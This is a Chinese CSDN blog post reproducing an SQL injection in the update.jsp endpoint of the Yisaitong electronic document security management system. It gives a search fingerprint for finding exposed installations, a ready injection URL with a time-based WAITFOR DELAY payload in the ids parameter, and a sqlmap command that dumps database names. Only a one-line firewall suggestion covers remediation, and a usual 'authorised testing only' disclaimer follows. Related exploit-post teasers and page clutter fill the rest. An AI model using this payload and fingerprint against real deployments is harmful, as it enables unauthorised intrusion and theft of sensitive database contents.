SQL注入漏洞

最新推荐文章于 2024-07-23 20:21:33 发布
最新推荐文章于 2024-07-23 20:21:33 发布
阅读量247 收藏
点赞数
文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/133884801
版权

如果文章对你有帮助,欢迎关注、点赞、收藏一键三连支持以下哦!
想要一起交流学习的小伙伴可以加zkaq222(备注CSDN,不备注通不过哦)进入学习,共同学习进步

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现

0x05 漏洞修复建议

0x01 漏洞介绍


亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。


0x02 影响产品

1.亿赛通电子文档安全管理系统

0x03 语法特征

1.app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现


页面
 

图片


POC

CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 

python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

ate/update.jsp?flag=1&ids=1,3)" --batch --dbs
 

 

 

图片
 

 

0x05 漏洞修复建议
 

 

设置防火墙规则,过滤漏洞相关的敏感链接监测
 

 
 
 
 
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
 
 
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
 

 

 

图片
 

没看够~?欢迎关注!
 

 
 

渗透工具
 

 

技术文档、书籍
 

 
 

 

面试题
 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 
 

 

 


                

        

        

    




    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
漏洞复现】亿赛电子文档安全管理系统-linkfilterservice-未授权

				
			

			

				

					知黑而守白
				

				

					01-25
					
					203
					
				

			

		

		

			
				
亿赛电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

			
		

	



                

              
                



	

		

			

				
					
某数据泄露防护(DLP)系统NetSecConfigAjax接口SQL注入漏洞复现 [附POC]

					
最新发布

				
			

			

				

					薛定谔嘚喵博客
				

				

					07-23
					
					583
					
				

			

		

		

			
				
某数据泄露防护(DLP)系统是一款综合性的数据安全产品,旨在过多种先进技术手段保护企业的敏感数据,防止数据泄露。某数据泄露防护(DLP)系统存在SQL注入漏洞,攻击者可过该漏洞获取数据库敏感数据。

			
		

	



                


  
              

                


	

		

			

				
					
某赛电子文档安全管理系统 多处 SQL注入漏洞复现

				
			

			

				

					ZL_1618的博客
				

				

					07-08
					
					348
					
				

			

		

		

			
				
某赛电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

			
		

	





	

		

			

				
					
亿某电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471

				
			

			

				

					拼命小孩的成长专栏
				

				

					12-18
					
					1714
					
				

			

		

		

			
				
任意文件上传漏洞 CNVD-2023-59471

			
		

	



		

			
		



	

		

			

				
					
Goby 漏洞发布|亿赛电子文档安全管理系统 UpgradeService1 接口远程代码执行漏洞

				
			

			

				

					m0_46699477的博客
				

				

					01-26
					
					1209
					
				

			

		

		

			
				
CloudBees Jenkins(前称Hudson Labs)是美国 CloudBees 公司的一套基于Java开发的持续集成工具,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。攻击者可过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

			
		

	





	

		

			

				
					
亿某电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞

				
			

			

				

					ZL_1618的博客
				

				

					03-25
					
					855
					
				

			

		

		

			
				
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。Ⅰ、漏洞描述亿某新一代电子文档安全管理系统(简称:CDG)是一款融合文档加密、数据分类分级、访问控制、关联分析、大数据分析、智能识别等核心技术的综合性数据智能安全产品。

			
		

	





	

		

			

				
					
某数据泄露防护(DLP)系统NoticeAjax接口SQL注入漏洞复现 [附POC]

				
			

			

				

					薛定谔嘚喵博客
				

				

					07-23
					
					320
					
				

			

		

		

			
				
某数据泄露防护(DLP)系统是一款综合性的数据安全产品,旨在过多种先进技术手段保护企业的敏感数据,防止数据泄露。某数据泄露防护(DLP)系统存在SQL注入漏洞,攻击者可过该漏洞获取数据库敏感数据。

			
		

	





	

		

			

				
					
某赛电子文档安全管理系统-多个接口存在-注入漏洞复现-1day未公开漏洞

				
			

			

				

					weixin_43167326的博客
				

				

					02-01
					
					405
					
				

			

		

		

			
				
某赛Sql注入漏洞新接口

			
		

	





	

		

			

				
					
SQL注入漏洞全接触.ppt

				
			

			

				

					11-15
				

			

		

		

			
				
"SQL注入漏洞全接触"知识点总结  一、 SQL注入漏洞的定义和原理  * SQL注入漏洞是指攻击者过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...

			
		

	





	

		

			

				
					
达OA sql注入漏洞.zip

				
			

			

				

					08-24
				

			

		

		

			
				
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入网络安全中的一个常见问题,允许攻击者过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...

			
		

	





	

		

			

				
					
SQL注入漏洞演示源代码

				
			

			

				

					09-29
				

			

		

		

			
				
SQL注入漏洞网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。  SQL注入过输入恶意的...

			
		

	





	

		

			

				
					
CSZ CMS 1.2.X sql注入漏洞

				
			

			

				

					09-07
				

			

		

		

			
				
 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。  ## 二、漏洞影响  CSZ CMS ...

			
		

	





	

		

			

				
					
YXcms-含有SQL注入漏洞的源码包.zip

				
			

			

				

					03-17
				

			

		

		

			
				
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者过在输入字段中插入恶意SQL代码,以获取、修改、删除...

			
		

	





	

		

			

				
					
自己动手编写SQL注入漏洞扫描工具

				
			

			

				

					12-31
				

			

		

		

			
				
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者过在输入字段中插入恶意的SQL语句来操纵数据库,获取...

			
		

	





	

		

			

				
					
亿赛电子文档安全管理系统 SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					12-14
					
					2166
					
				

			

		

		

			
				
由于亿赛电子文档安全管理系统/update.jsp处的ids参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。

			
		

	





	

		

			

				
					
0day!!忆赛某接口存在SQL注入漏洞(大量资产存在)-新接口

				
			

			

				

					weixin_43167326的博客
				

				

					03-12
					
					583
					
				

			

		

		

			
				
此电子文档安全管理系统是一套专业的文档安全管理解决方案。它提供了多层次的保护措施,确保用户的电子文档在存储、传输和使用过程中的安全性。此系统某接口存在SQL注入漏洞

			
		

	





	

		

			

				
					
某赛电子文档安全管理系统 PolicyAjax SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					01-31
					
					1015
					
				

			

		

		

			
				
由于某赛电子文档安全管理系统PolicyAjax处的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值